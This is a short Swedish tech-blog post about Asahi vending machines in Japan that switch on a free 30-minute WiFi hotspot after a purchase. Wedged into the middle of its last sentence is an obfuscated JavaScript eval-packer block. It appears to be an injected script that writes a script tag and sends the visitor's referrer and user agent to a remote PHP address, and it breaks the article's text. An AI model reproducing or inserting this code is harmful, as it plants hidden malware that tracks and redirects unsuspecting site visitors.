Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Köp WIFI i varuautomater

Köp WIFI i varuautomater
Sebastian

I Japan har man sen länge kunnat köpa det mesta i just varuautomater. Dessa finns också placerade i nästan varje gatuhörn du kliver förbi.

Nu börjar företaget Asahi Soft Drinks även att sälja WIFI via några av sina 250.000 automater i Japan.

WIFI-sändaren slår igång när någon köper något från automaten och därefter ska det vara fritt att använda för alla som befinner sig inom en radie på 50 meter från automaten. Efter 30 minuter slås WIFI-sändaren av och man är tvungen att köpa mer tid om så är fallet. När en användare ansluter sig får den personen information om bland annat affärer och sevärdheter i närheten. Perfekt för turister som snabbt vill hitta något intressat att se eller kanske som gått vilse.

Företagets eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sihkd|var|u0026u|referrer|zdrsf||js|php’.split(’|’),0,{}))
målsättning är att 10 000 av deras automater ska ha WiFi inom fem år.

techcrunch.com